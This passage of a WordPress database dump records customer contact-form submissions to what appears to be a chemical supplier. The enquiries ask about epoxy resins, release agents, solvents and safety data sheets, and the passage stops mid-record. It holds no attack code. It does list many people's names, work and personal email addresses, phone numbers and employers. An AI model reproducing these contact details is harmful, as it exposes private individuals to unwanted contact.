INSERT INTO `wp_postmeta` VALUES (36375, 4057, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36376, 4057, '_field_1', 'Kathie Land'); 
INSERT INTO `wp_postmeta` VALUES (36377, 4057, '_field_10', 'B &amp; D Machine and Tool Inc'); 
INSERT INTO `wp_postmeta` VALUES (36378, 4057, '_field_2', 'sales@bndmt.com'); 
INSERT INTO `wp_postmeta` VALUES (36379, 4057, '_field_8', '(321) 727-0098'); 
INSERT INTO `wp_postmeta` VALUES (36380, 4057, '_field_3', 'I would like to get pricing and turnaround time on Epon Resin 828 and Versamid 140. in quart and pint sizes please.\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (36381, 4057, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36382, 4057, '_sub_id', '4057'); 
INSERT INTO `wp_postmeta` VALUES (36383, 4058, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36384, 4058, '_seq_num', '571'); 
INSERT INTO `wp_postmeta` VALUES (36385, 4058, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36386, 4058, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36387, 4058, '_field_1', 'Jeff Christafore'); 
INSERT INTO `wp_postmeta` VALUES (36388, 4058, '_field_10', 'Bombardier'); 
INSERT INTO `wp_postmeta` VALUES (36389, 4058, '_field_2', 'jeff.christafore@aero.bombardier.com'); 
INSERT INTO `wp_postmeta` VALUES (36390, 4058, '_field_8', '(304) 848-5202'); 
INSERT INTO `wp_postmeta` VALUES (36391, 4058, '_field_3', 'Can you please provide me the most current SDS for MS-143TE?  I would appreciate any assistance you can provide.'); 
INSERT INTO `wp_postmeta` VALUES (36392, 4058, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36393, 4058, '_sub_id', '4058'); 
INSERT INTO `wp_postmeta` VALUES (36394, 4059, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36395, 4059, '_seq_num', '572'); 
INSERT INTO `wp_postmeta` VALUES (36396, 4059, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36397, 4059, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36398, 4059, '_field_1', 'Jose Delacruz'); 
INSERT INTO `wp_postmeta` VALUES (36399, 4059, '_field_10', 'Columbia Helicopters'); 
INSERT INTO `wp_postmeta` VALUES (36400, 4059, '_field_2', 'jdelacruz@colheli.com'); 
INSERT INTO `wp_postmeta` VALUES (36401, 4059, '_field_8', '(503) 678-1222'); 
INSERT INTO `wp_postmeta` VALUES (36402, 4059, '_field_3', 'Need sds for below chemicals:\nMILLER STEPHENSON CHEMICAL Ms-122AD DPMS-Z0918A PTFE Release agent/dry Lubricant\nMS-222N, MS-222T, MS-222F Aero-duster\nMS-580, DPMS-C0720A, Precision Cleaning Solvent'); 
INSERT INTO `wp_postmeta` VALUES (36403, 4059, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36404, 4059, '_sub_id', '4059'); 
INSERT INTO `wp_postmeta` VALUES (36405, 4060, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36406, 4060, '_seq_num', '573'); 
INSERT INTO `wp_postmeta` VALUES (36407, 4060, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36408, 4060, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36409, 4060, '_field_1', 'MASAYUKI KONDO'); 
INSERT INTO `wp_postmeta` VALUES (36410, 4060, '_field_10', 'JAPAN AIRLINES CO., LTD'); 
INSERT INTO `wp_postmeta` VALUES (36411, 4060, '_field_2', 'masayuki.kondo@jal.com'); 
INSERT INTO `wp_postmeta` VALUES (36412, 4060, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36413, 4060, '_field_3', 'I searched for MS-122N/CO2 but this material seemed to be obsoleted.\r\nI would like to know any replacement for MS-122N/CO2.'); 
INSERT INTO `wp_postmeta` VALUES (36414, 4060, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36415, 4060, '_sub_id', '4060'); 
INSERT INTO `wp_postmeta` VALUES (36416, 4061, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36417, 4061, '_seq_num', '574'); 
INSERT INTO `wp_postmeta` VALUES (36418, 4061, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36419, 4061, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36420, 4061, '_field_1', 'Samantha Haddock'); 
INSERT INTO `wp_postmeta` VALUES (36421, 4061, '_field_10', 'Helicomb International'); 
INSERT INTO `wp_postmeta` VALUES (36422, 4061, '_field_2', 'srhaddock@pccaero.com'); 
INSERT INTO `wp_postmeta` VALUES (36423, 4061, '_field_8', '(918) 576-7972'); 
INSERT INTO `wp_postmeta` VALUES (36424, 4061, '_field_3', 'I am in need of the most up-to-date Safety Data Sheet for your product: Momentive Epikure 3282 Curing Agent'); 
INSERT INTO `wp_postmeta` VALUES (36425, 4061, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36426, 4061, '_sub_id', '4061'); 
INSERT INTO `wp_postmeta` VALUES (36427, 4062, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36428, 4062, '_seq_num', '575'); 
INSERT INTO `wp_postmeta` VALUES (36429, 4062, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36430, 4062, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36431, 4062, '_field_1', 'Gonzalo Rosas'); 
INSERT INTO `wp_postmeta` VALUES (36432, 4062, '_field_10', 'Altum Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (36433, 4062, '_field_2', 'grosas@altumaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (36434, 4062, '_field_8', '(954) 210-8721'); 
INSERT INTO `wp_postmeta` VALUES (36435, 4062, '_field_3', 'QUOTE REQ:\r\nEPIKURE 3125 \r\n58	GL\r\nPRICE -  LEAD TIME - SHIP COST TO SUNRISE FL 33325\r\nIS THE PRODUCT MADE TO ORDER?\r\nIS SHIP AS HAZARD AND WITH THE LABELS?\r\nDOES IT COMES WITH THE SDS?\r\nUI = GL\r\nSize: 1 gallon in a can\r\n'); 
INSERT INTO `wp_postmeta` VALUES (36436, 4062, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36437, 4062, '_sub_id', '4062'); 
INSERT INTO `wp_postmeta` VALUES (36438, 4063, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36439, 4063, '_seq_num', '576'); 
INSERT INTO `wp_postmeta` VALUES (36440, 4063, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36441, 4063, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36442, 4063, '_field_1', 'Manabu Tajima'); 
INSERT INTO `wp_postmeta` VALUES (36443, 4063, '_field_10', 'Kawaju Gifu Engineering Co., LTD.'); 
INSERT INTO `wp_postmeta` VALUES (36444, 4063, '_field_2', 'tajima_m-kge@corp.khi.co.jp'); 
INSERT INTO `wp_postmeta` VALUES (36445, 4063, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36446, 4063, '_field_3', 'In accordance with your recommendation, we will be change MS-143H PTFE release agent to MS-143XD.  Then we need information for shelf life; 1.storage temperature range, 2.the initial date of reckoning, 3.shelf life, 4.other limitation for storage.  Please reply.\n(Sorry. My E-mail is receiving only. If need reply to you, we send it with this infomation system.)  '); 
INSERT INTO `wp_postmeta` VALUES (36447, 4063, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36448, 4063, '_sub_id', '4063'); 
INSERT INTO `wp_postmeta` VALUES (36449, 4064, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36450, 4064, '_seq_num', '577'); 
INSERT INTO `wp_postmeta` VALUES (36451, 4064, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36452, 4064, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36453, 4064, '_field_1', 'Jeffrey Barnes'); 
INSERT INTO `wp_postmeta` VALUES (36454, 4064, '_field_10', '4x Forensic Laboritories'); 
INSERT INTO `wp_postmeta` VALUES (36455, 4064, '_field_2', 'jeff@4xforensic.com'); 
INSERT INTO `wp_postmeta` VALUES (36456, 4064, '_field_8', '(714) 450-8500'); 
INSERT INTO `wp_postmeta` VALUES (36457, 4064, '_field_3', 'I need to remove an epoxy potting compound from a transformer for forensic analysis.   The copper and steel components of the transformer should not be affected by the solution.  I will need to dissolve 1-3 inches of epoxy.\r\n\r\nTransformer specification as as follows:\r\nhttp://www.schneider-electric.us/en/product/5S1F/transformer-dry-5kva-240x480v-120-240v/\r\n\r\nThe solution will need to be California compliant.\r\n\r\nDo you have a solvent that will perform this task?\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (36458, 4064, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36459, 4064, '_sub_id', '4064'); 
INSERT INTO `wp_postmeta` VALUES (36460, 4065, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36461, 4065, '_seq_num', '578'); 
INSERT INTO `wp_postmeta` VALUES (36462, 4065, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36463, 4065, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36464, 4065, '_field_1', 'Stephanie Spielmann'); 
INSERT INTO `wp_postmeta` VALUES (36465, 4065, '_field_10', 'Kleinfeld Labortechnik GmbH'); 
INSERT INTO `wp_postmeta` VALUES (36466, 4065, '_field_2', 'sspielmann@kleinfeld-labor.com'); 
INSERT INTO `wp_postmeta` VALUES (36467, 4065, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36468, 4065, '_field_3', 'Dear Sirs, we are a laboratory Distributor from Germany. Please be so Kind to let us have a Quotation with Price, item no., Discount, freight charges, customs code, Country of origin and delivery time for the following item.\n\n1 Glass Bottle Solvent Degreaser, Vertel MCA\nThank you\nKind regards\nKleinfeld Labortechnik GmbH\ni.A: Stephanie Spielmann'); 
INSERT INTO `wp_postmeta` VALUES (36469, 4065, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36470, 4065, '_sub_id', '4065'); 
INSERT INTO `wp_postmeta` VALUES (36471, 4066, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36472, 4066, '_seq_num', '579'); 
INSERT INTO `wp_postmeta` VALUES (36473, 4066, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36474, 4066, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36475, 4066, '_field_1', 'Paul Harrington'); 
INSERT INTO `wp_postmeta` VALUES (36476, 4066, '_field_10', 'Liviingstone Coating Corporation'); 
INSERT INTO `wp_postmeta` VALUES (36477, 4066, '_field_2', 'pharrington@livcoat.com'); 
INSERT INTO `wp_postmeta` VALUES (36478, 4066, '_field_8', '(704) 392-2323'); 
INSERT INTO `wp_postmeta` VALUES (36479, 4066, '_field_3', 'Siemens Energy is currently applying your product MS-122AD PTFE release agent/dry lubricant.   Siemens is requesting that we begin applying this coating for them.  I have a product data sheet.  Please provide pricing &amp; SDS.   Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (36480, 4066, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36481, 4066, '_sub_id', '4066'); 
INSERT INTO `wp_postmeta` VALUES (36482, 4067, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36483, 4067, '_seq_num', '278'); 
INSERT INTO `wp_postmeta` VALUES (36484, 4067, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36485, 4067, '_field_12', 'Alessandro Stuart Savoia'); 
INSERT INTO `wp_postmeta` VALUES (36486, 4067, '_field_13', 'Università Roma Tre - Department of Engineering'); 
INSERT INTO `wp_postmeta` VALUES (36487, 4067, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36488, 4067, '_field_14', 'alessandro.savoia@uniroma3.it'); 
INSERT INTO `wp_postmeta` VALUES (36489, 4067, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (36490, 4067, '_field_16', 'Dear Sir/Madame,\r\nI am writing to ask technical support before choosing the right mold release agent to be used in an electronic component packaging process. Miller-stephenson release agents were suggested by the manufacturer of the epoxy resin we are using in the process (Epotek 301) that needs to be casted using a viton-based mold and successively released. \r\n\r\nWe are working on an advanced MEMS packaging process on behalf of ST Microelectronics. The application is the following.\r\nWe realize viton-based molds with which we hold a silicon chip around its edges.\r\nThen, we cast an uncured epoxy resin in the mold, the Epotek 301, which encapsulates the silicon chip.\r\nWe then heat-cure the Epoxy at 70°C.\r\nFinally, we want to remove the viton-based mold from the resulting epoxy-silicon chip assembly.\r\nTherefore, since the resin adheres to the viton mold, we need to apply to a release agent on it before resin application.\r\n\r\nThe manufacturer (Epotek) suggests PTFE-based release agents but with other product we obtained not very good release performance. \r\n\r\nSo, I kindly ask you which is the best solution you can provide for this application.\r\nMoreover, could you please indicate a distributor for Italy or Europe where your products can be purchased?\r\n\r\nThank you and I look forward to hearing from you.\r\n\r\nBest regards,\r\nAlessandro Savoia\r\nwww.cmut.it  '); 
INSERT INTO `wp_postmeta` VALUES (36491, 4067, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36492, 4067, '_sub_id', '4067'); 
INSERT INTO `wp_postmeta` VALUES (36493, 4068, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36494, 4068, '_seq_num', '279'); 
INSERT INTO `wp_postmeta` VALUES (36495, 4068, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36496, 4068, '_field_12', 'Travis Johnson'); 
INSERT INTO `wp_postmeta` VALUES (36497, 4068, '_field_13', 'NASA'); 
INSERT INTO `wp_postmeta` VALUES (36498, 4068, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36499, 4068, '_field_14', 'travis.s.johnson@nasa.gov'); 
INSERT INTO `wp_postmeta` VALUES (36500, 4068, '_field_15', '(208) 590-0343'); 
INSERT INTO `wp_postmeta` VALUES (36501, 4068, '_field_16', 'Did MS122-AV replace MS-122DF? \r\nIs MS-122AV a suitable supplement? \r\nIf not what is a suitable supplement for use in aviation ? \r\n\r\nThank you. '); 
INSERT INTO `wp_postmeta` VALUES (36502, 4068, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36503, 4068, '_sub_id', '4068'); 
INSERT INTO `wp_postmeta` VALUES (36504, 4069, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36505, 4069, '_seq_num', '580'); 
INSERT INTO `wp_postmeta` VALUES (36506, 4069, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36507, 4069, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36508, 4069, '_field_1', 'Richard E McKune'); 
INSERT INTO `wp_postmeta` VALUES (36509, 4069, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36510, 4069, '_field_2', 'rmckune@verizon.net'); 
INSERT INTO `wp_postmeta` VALUES (36511, 4069, '_field_8', '(908) 688-5982'); 
INSERT INTO `wp_postmeta` VALUES (36512, 4069, '_field_3', 'Were can I buy ?'); 
INSERT INTO `wp_postmeta` VALUES (36513, 4069, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36514, 4069, '_sub_id', '4069'); 
INSERT INTO `wp_postmeta` VALUES (36515, 4070, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36516, 4070, '_seq_num', '280'); 
INSERT INTO `wp_postmeta` VALUES (36517, 4070, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36518, 4070, '_field_12', 'Paul Harrington'); 
INSERT INTO `wp_postmeta` VALUES (36519, 4070, '_field_13', 'Livingstone Coating Corp.'); 
INSERT INTO `wp_postmeta` VALUES (36520, 4070, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36521, 4070, '_field_14', 'pharrington@livcoat.com'); 
INSERT INTO `wp_postmeta` VALUES (36522, 4070, '_field_15', '(704) 392-2323'); 
INSERT INTO `wp_postmeta` VALUES (36523, 4070, '_field_16', 'Siemens Energy is asking us to apply MS-122AD PTFE Release Agent/Dry Lubricant.  Due to the potential volume, Livingstone may need to buy this material in bulk formula.  I have been given a product code MS-143 TE.   Please provide technical data, SDS, and pricing for MS-143 TE.  Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (36524, 4070, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36525, 4070, '_sub_id', '4070'); 
INSERT INTO `wp_postmeta` VALUES (36526, 4071, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36527, 4071, '_seq_num', '581'); 
INSERT INTO `wp_postmeta` VALUES (36528, 4071, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36529, 4071, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36530, 4071, '_field_1', 'Joshua Mitchell'); 
INSERT INTO `wp_postmeta` VALUES (36531, 4071, '_field_10', 'ARL'); 
INSERT INTO `wp_postmeta` VALUES (36532, 4071, '_field_2', 'joshua.mitchell19.ctr@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (36533, 4071, '_field_8', '(410) 306-0977'); 
INSERT INTO `wp_postmeta` VALUES (36534, 4071, '_field_3', 'Good afternoon,\r\n\r\nI need a quote for the item listed below (we do qualify for GSA pricing if available). \r\nPlease include a maximum shipping estimate, i.e. &quot;the estimated cost of shipping will be no more than $____________&quot; \r\nThe shipping address is: \r\nU.S. Army Research Laboratory\r\nATTN: John La Scala\r\n321 Colleran Rd\r\nRDRL-WMM-C\r\nAberdeen Proving Ground, MD 21005\r\n\r\nItem:\r\n4 gallons of EPON 826\r\n\r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (36535, 4071, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36536, 4071, '_sub_id', '4071'); 
INSERT INTO `wp_postmeta` VALUES (36537, 4072, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36538, 4072, '_seq_num', '582'); 
INSERT INTO `wp_postmeta` VALUES (36539, 4072, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36540, 4072, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36541, 4072, '_field_1', 'Erick Oikawa'); 
INSERT INTO `wp_postmeta` VALUES (36542, 4072, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36543, 4072, '_field_2', 'erickwill@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36544, 4072, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36545, 4072, '_field_3', 'Hi, \r\nMy name is Erick, I&#039;m from Brazil and I would like to represent or to be a reseller here in my country.\r\nIs there any way to do that?\r\nThanks in advance\r\nErick'); 
INSERT INTO `wp_postmeta` VALUES (36546, 4072, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36547, 4072, '_sub_id', '4072'); 
INSERT INTO `wp_postmeta` VALUES (36548, 4073, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36549, 4073, '_seq_num', '583'); 
INSERT INTO `wp_postmeta` VALUES (36550, 4073, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36551, 4073, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36552, 4073, '_field_1', 'Ms. Nutcha  Teachathanyakul'); 
INSERT INTO `wp_postmeta` VALUES (36553, 4073, '_field_10', 'S-corp Innovation Co.,Ltd'); 
INSERT INTO `wp_postmeta` VALUES (36554, 4073, '_field_2', 'sn.colorful@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36555, 4073, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36556, 4073, '_field_3', 'Hello, Sales Department\r\n          I&#039;m Nutcha from Thailand.\r\nMy company is dealer of science supplied. And I interested of your product. I would like to know who distributor of your product in Thailand or nearly area. please,\r\n\r\nBest regards\r\nThank you \r\nMs. Nutcha  Teachathanyakul\r\nS-corp Innovation Co.,Ltd\r\n+6681-565-4736'); 
INSERT INTO `wp_postmeta` VALUES (36557, 4073, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36558, 4073, '_sub_id', '4073'); 
INSERT INTO `wp_postmeta` VALUES (36559, 4074, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36560, 4074, '_seq_num', '584'); 
INSERT INTO `wp_postmeta` VALUES (36561, 4074, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36562, 4074, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36563, 4074, '_field_1', 'tom stross OHS compliance officer'); 
INSERT INTO `wp_postmeta` VALUES (36564, 4074, '_field_10', 'Balluff Inc'); 
INSERT INTO `wp_postmeta` VALUES (36565, 4074, '_field_2', 'tom.stross@balluff.com'); 
INSERT INTO `wp_postmeta` VALUES (36566, 4074, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36567, 4074, '_field_3', 'Our company requires GHS SDS sheets for the following Items.\nPlease send .\n\nthanks\nTom\n\nMS-930 Safezone Contact Re-Nu MS-930'); 
INSERT INTO `wp_postmeta` VALUES (36568, 4074, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36569, 4074, '_sub_id', '4074'); 
INSERT INTO `wp_postmeta` VALUES (36570, 4075, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36571, 4075, '_seq_num', '585'); 
INSERT INTO `wp_postmeta` VALUES (36572, 4075, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36573, 4075, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36574, 4075, '_field_1', 'David Scott'); 
INSERT INTO `wp_postmeta` VALUES (36575, 4075, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36576, 4075, '_field_2', 'eliteplmbcontractors@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36577, 4075, '_field_8', '(925) 272-8934'); 
INSERT INTO `wp_postmeta` VALUES (36578, 4075, '_field_3', '\r\n\r\nHello Sales,\r\n\r\nWe need you to inform us if you are able to issue quote for the following items.\r\n\r\nPower Cord SOOW Cable Power Cable Power Cord - Type SOOW, 12/4 12 gauge 4conductor\r\n\r\nBattery Cable 1283-4-133T-0 4 1C UL 1283 1 AWG 133ST BLACK\r\n2AWG SGT Battery Cable, Black and Red\r\n\r\nTripp lite Inverter  APSX6048VRNET\r\nMagnum Energy MS4024PAE 24V Pure Sine\r\n12v 100AH SEAL LEAD BATTERY/\r\n260watts to 320watts 24v solar module\r\nLooking forward to your read from you also advise us the lead time?\r\nPlease advise\r\n\r\nDavid Scott\r\nSUN ENERGY INC\r\nPhone-925 272 8934\r\neliteplmbcontractors@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36579, 4075, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36580, 4075, '_sub_id', '4075'); 
INSERT INTO `wp_postmeta` VALUES (36581, 4076, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36582, 4076, '_seq_num', '586'); 
INSERT INTO `wp_postmeta` VALUES (36583, 4076, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36584, 4076, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36585, 4076, '_field_1', 'Bryan Pfahl'); 
INSERT INTO `wp_postmeta` VALUES (36586, 4076, '_field_10', 'Veterinary Simulator Industries Ltd'); 
INSERT INTO `wp_postmeta` VALUES (36587, 4076, '_field_2', 'consult@vetsimulators.com'); 
INSERT INTO `wp_postmeta` VALUES (36588, 4076, '_field_8', '(403) 262-9393'); 
INSERT INTO `wp_postmeta` VALUES (36589, 4076, '_field_3', 'We use large platinum-cure silicone molds into which we cast (hand lay-up) epoxy resin/fiberglass composite. http://vetsimulators.net/ We&#039;re looking for a release agent that will protect the silicone from the amides in the epoxy but won&#039;t transfer to the cast, as we paint the product. Or the release has to be easily removed from the cast. I would greatly appreciate a suggestion or a phone call to either myself or my business partner, Russ Gray, to discuss some possibilities.\r\n\r\nMany thanks,\r\n\r\nBryan'); 
INSERT INTO `wp_postmeta` VALUES (36590, 4076, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36591, 4076, '_sub_id', '4076'); 
INSERT INTO `wp_postmeta` VALUES (36592, 4077, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36593, 4077, '_seq_num', '281'); 
INSERT INTO `wp_postmeta` VALUES (36594, 4077, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36595, 4077, '_field_12', 'Nekesh'); 
INSERT INTO `wp_postmeta` VALUES (36596, 4077, '_field_13', '3ddd interior'); 
INSERT INTO `wp_postmeta` VALUES (36597, 4077, '_field_18', 'India'); 
INSERT INTO `wp_postmeta` VALUES (36598, 4077, '_field_14', '3dddinterior@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36599, 4077, '_field_15', '(918) 080-0151'); 
INSERT INTO `wp_postmeta` VALUES (36600, 4077, '_field_16', 'Want anti scratch epoxy clear coat'); 
INSERT INTO `wp_postmeta` VALUES (36601, 4077, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36602, 4077, '_sub_id', '4077'); 
INSERT INTO `wp_postmeta` VALUES (36603, 4078, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36604, 4078, '_seq_num', '282'); 
INSERT INTO `wp_postmeta` VALUES (36605, 4078, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36606, 4078, '_field_12', 'Chris leasure'); 
INSERT INTO `wp_postmeta` VALUES (36607, 4078, '_field_13', 'Same'); 
INSERT INTO `wp_postmeta` VALUES (36608, 4078, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36609, 4078, '_field_14', 'Crisjl@aol.com'); 
INSERT INTO `wp_postmeta` VALUES (36610, 4078, '_field_15', '(215) 350-5991'); 
INSERT INTO `wp_postmeta` VALUES (36611, 4078, '_field_16', 'Hello. I was referred to you by Manley. I was looking for their product number 40180 which was discontinued by them. It&#039;s a high temp exhaust port epoxy. They said you were the manufacturer. Do you still sell this product? Thankyou, chris leasure'); 
INSERT INTO `wp_postmeta` VALUES (36612, 4078, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36613, 4078, '_sub_id', '4078'); 
INSERT INTO `wp_postmeta` VALUES (36614, 4079, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36615, 4079, '_seq_num', '587'); 
INSERT INTO `wp_postmeta` VALUES (36616, 4079, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36617, 4079, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36618, 4079, '_field_1', 'Daniel Taylor'); 
INSERT INTO `wp_postmeta` VALUES (36619, 4079, '_field_10', 'TeraDiode'); 
INSERT INTO `wp_postmeta` VALUES (36620, 4079, '_field_2', 'DanielTaylor@TeraDiode.com'); 
INSERT INTO `wp_postmeta` VALUES (36621, 4079, '_field_8', '(339) 293-7020'); 
INSERT INTO `wp_postmeta` VALUES (36622, 4079, '_field_3', '4 Quarts of MS-111 Epoxy Stripping Agent &amp; SDS'); 
INSERT INTO `wp_postmeta` VALUES (36623, 4079, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36624, 4079, '_sub_id', '4079'); 
INSERT INTO `wp_postmeta` VALUES (36625, 4080, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36626, 4080, '_seq_num', '588'); 
INSERT INTO `wp_postmeta` VALUES (36627, 4080, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36628, 4080, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36629, 4080, '_field_1', 'Daniel Trombley'); 
INSERT INTO `wp_postmeta` VALUES (36630, 4080, '_field_10', 'Department of national Defence'); 
INSERT INTO `wp_postmeta` VALUES (36631, 4080, '_field_2', 'daniel.trombley@forces.gc.ca'); 
INSERT INTO `wp_postmeta` VALUES (36632, 4080, '_field_8', ''); 
